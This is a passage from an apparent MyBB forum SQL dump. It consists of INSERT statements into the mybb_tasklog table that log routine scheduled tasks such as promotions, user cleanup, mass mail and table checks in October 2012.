successfully ran.'); INSERT INTO mybb_tasklog VALUES('12139', '5', '1350925564', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12140', '3', '1350925687', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12141', '1', '1350925693', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12142', '7', '1350925764', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12143', '9', '1350926117', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12144', '5', '1350926703', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12145', '9', '1350926710', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12146', '3', '1350927122', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12147', '9', '1350927777', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12148', '5', '1350927913', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12149', '9', '1350928693', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12150', '3', '1350928744', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12151', '1', '1350930242', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12152', '7', '1350930405', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12153', '5', '1350930428', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12154', '9', '1350930618', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12155', '3', '1350930844', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12156', '9', '1350931500', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12157', '5', '1350931724', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12158', '9', '1350932485', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12159', '3', '1350932626', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12160', '1', '1350932685', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12161', '7', '1350932784', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12162', '5', '1350933497', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12163', '9', '1350934171', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12164', '5', '1350935006', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12165', '3', '1350935101', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12166', '9', '1350935138', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12167', '5', '1350935182', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12168', '9', '1350936676', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12169', '3', '1350936682', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12170', '1', '1350936688', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12171', '7', '1350936704', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12172', '5', '1350936709', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12173', '5', '1350937521', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12174', '9', '1350937556', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12175', '3', '1350937813', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12176', '9', '1350938409', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12177', '5', '1350938808', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12178', '9', '1350939368', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12179', '3', '1350939560', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12180', '1', '1350939616', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12181', '7', '1350939632', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12182', '5', '1350939911', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12183', '9', '1350940219', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12184', '5', '1350941225', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12185', '9', '1350941419', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12186', '3', '1350941477', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12187', '9', '1350942429', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12188', '5', '1350942431', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12189', '9', '1350943002', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12190', '3', '1350943160', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12191', '1', '1350943300', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12192', '7', '1350943305', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12193', '5', '1350943509', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12194', '9', '1350943898', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12195', '5', '1350945960', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12196', '9', '1350946037', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12197', '3', '1350946507', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12198', '9', '1350946671', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12199', '3', '1350946792', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12200', '1', '1350946839', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12201', '7', '1350946841', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12202', '5', '1350947180', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12203', '9', '1350949784', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12204', '5', '1350949844', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12205', '3', '1350949880', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12206', '9', '1350951748', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12207', '3', '1350952707', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12208', '1', '1350952787', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12209', '2', '1350952816', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12210', '7', '1350952965', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12211', '11', '1350953053', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12212', '5', '1350953134', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12213', '9', '1350953307', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12214', '9', '1350954047', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12215', '3', '1350955812', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12216', '1', '1350957012', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12217', '7', '1350959426', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12218', '5', '1350959644', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12219', '9', '1350960817', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12220', '3', '1350960818', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12221', '1', '1350961219', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12222', '5', '1350961234', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12223', '9', '1350962176', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12224', '3', '1350962432', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12225', '7', '1350962593', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12226', '5', '1350962742', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12227', '9', '1350962925', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12228', '3', '1350963160', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12229', '9', '1350964071', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12230', '5', '1350964280', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12231', '9', '1350964716', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12232', '3', '1350964840', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12233', '1', '1350964852', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12234', '7', '1350964882', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12235', '5', '1350965524', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12236', '9', '1350967370', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12237', '5', '1350967963', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12238', '3', '1350968570', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12239', '9', '1350970317', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12240', '1', '1350970323', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12241', '7', '1350970329', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12242', '5', '1350970337', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12243', '3', '1350970778', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12244', '9', '1350970962', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12245', '5', '1350971116', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12246', '9', '1350973766', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12247', '3', '1350973769', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12248', '1', '1350973820', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12249', '7', '1350973826', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12250', '5', '1350973829', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12251', '3', '1350973997', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12252', '9', '1350975006', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12253', '5', '1350975338', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12254', '9', '1350975378', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12255', '3', '1350975553', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12256', '1', '1350977397', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12257', '7', '1350977415', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12258', '5', '1350977458', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12259', '9', '1350977712', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12260', '3', '1350977730', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12261', '9', '1350978054', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12262', '5', '1350978337', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12263', '9', '1350980189', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12264', '3', '1350980193', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12265', '1', '1350980199', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12266', '7', '1350980223', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12267', '5', '1350980233', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12268', '5', '1350980914', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12269', '9', '1350980929', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12270', '3', '1350981037', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12271', '9', '1350989453', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12272', '5', '1350991360', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12273', '3', '1350991367', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12274', '1', '1350991390', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12275', '7', '1350991406', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12276', '9', '1350991544', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12277', '5', '1350992026', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12278', '3', '1350992056', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12279', '9', '1350992913', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12280', '5', '1350992917', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12281', '9', '1350993559', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12282', '3', '1350993562', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12283', '1', '1350993608', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12284', '4', '1350993672', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12285', '7', '1350993701', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12286', '5', '1350993902', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12287', '9', '1350994349', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12288', '5', '1350995350', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12289', '9', '1350995426', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12290', '3', '1350995433', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12291', '9', '1350997815', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12292', '5', '1350998005', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12293', '3', '1350998011', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12294', '1', '1350998028', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12295', '7', '1350998061', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12296', '5', '1350998702', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12297', '9', '1350998895', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12298', '3', '1350999051', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12299', '9', '1350999744', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12300', '5', '1351000183', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12301', '9', '1351005053', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12302', '3', '1351005245', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12303', '1', '1351005316', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12304', '7', '1351005320', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12305', '5', '1351005330', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12306', '5', '1351006691', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12307', '9', '1351006702', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12308', '3', '1351006716', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12309', '9', '1351007446', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12310', '5', '1351007452', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12311', '9', '1351009670', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12312', '3', '1351011651', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12313', '1', '1351011666', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12314', '7', '1351011669', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12315', '5', '1351011691', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12316', '9', '1351011740', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12317', '5', '1351012009', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12318', '9', '1351012344', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12319', '5', '1351014224', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12320', '9', '1351014592', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12321', '3', '1351015069', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12322', '5', '1351015088', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12323', '9', '1351015711', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12324', '3', '1351016699', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12325', '1', '1351017272', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12326', '7', '1351017276', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12327', '5', '1351017277', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12328', '9', '1351017374', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12329', '3', '1351019868', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12330', '9', '1351019914', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12331', '5', '1351019921', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12332', '1', '1351019929', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12333', '7', '1351019931', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12334', '5', '1351022742', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12335', '9', '1351022773', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12336', '3', '1351023057', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12337', '1', '1351023062', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12338', '7', '1351023080', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12339', '9', '1351023103', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12340', '5', '1351023982', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12341', '9', '1351023990', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12342', '3', '1351024551', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12343', '9', '1351025094', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12344', '5', '1351025170', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12345', '9', '1351027771', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12346', '3', '1351027798', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12347', '1', '1351027811', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12348', '7', '1351028663', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12349', '5', '1351028683', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12350', '3', '1351028694', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12351', '9', '1351028721', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12352', '5', '1351028723', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12353', '9', '1351029327', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12354', '3', '1351029666', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12355', '1', '1351029864', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12356', '7', '1351029907', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12357', '5', '1351030037', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12358', '9', '1351030211', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12359', '5', '1351031141', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12360', '9', '1351031149', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12361', '3', '1351031406', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12362', '9', '1351032040', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12363', '5', '1351032355', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12364', '9', '1351032943', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12365', '3', '1351034181', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12366', '1', '1351034191', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12367', '7', '1351034199', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12368', '5', '1351034297', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12369', '9', '1351034498', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12370', '5', '1351034724', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12371', '9', '1351034836', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12372', '3', '1351035036', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12373', '9', '1351035751', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12374', '5', '1351036003', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12375', '9', '1351038398', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12376', '3', '1351038413', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12377', '1', '1351038449', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12378', '2', '1351038454', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12379', '7', '1351038457', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12380', '11', '1351038461', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12381', '5', '1351038621', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12382', '3', '1351038856', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12383', '9', '1351039877', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12384', '5', '1351039911', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12385', '9', '1351040161', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12386', '3', '1351040343', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12387', '1', '1351040508', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12388', '7', '1351040511', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12389', '5', '1351040784', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12390', '9', '1351041459', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12391', '5', '1351041967', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12392', '9', '1351041981', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12393', '3', '1351042355', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12394', '9', '1351042905', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12395', '5', '1351043368', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12396', '9', '1351043822', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12397', '3', '1351043975', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12398', '1', '1351044045', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12399', '7', '1351044047', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12400', '5', '1351044312', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12401', '9', '1351044685', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12402', '5', '1351045526', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12403', '9', '1351045921', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12404', '3', '1351045950', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12405', '9', '1351046963', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12406', '5', '1351047013', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12407', '9', '1351047571', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12408', '3', '1351047823', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12409', '1', '1351047827', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12410', '7', '1351047922', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12411', '5', '1351047989', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12412', '9', '1351048992', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12413', '5', '1351049181', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12414', '9', '1351049240', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12415', '3', '1351049649', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12416', '9', '1351050051', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12417', '5', '1351050350', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12418', '9', '1351051066', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12419', '3', '1351051246', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12420', '1', '1351051557', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12421', '7', '1351051575', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12422', '5', '1351051679', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12423', '9', '1351051836', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12424', '5', '1351052751', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12425', '9', '1351052782', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12426', '3', '1351054398', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12427', '9', '1351054443', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12428', '5', '1351054451', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12429', '9', '1351055409', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12430', '3', '1351055466', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12431', '1', '1351055498', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12432', '7', '1351055526', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12433', '5', '1351055739', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12434', '5', '1351056605', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12435', '9', '1351057038', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12436', '3', '1351057256', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12437', '9', '1351057587', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12438', '5', '1351057785', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12439', '9', '1351058453', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12440', '3', '1351059628', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12441', '1', '1351060006', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12442', '7', '1351060019', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12443', '5', '1351060104', 'The promotions task successfully 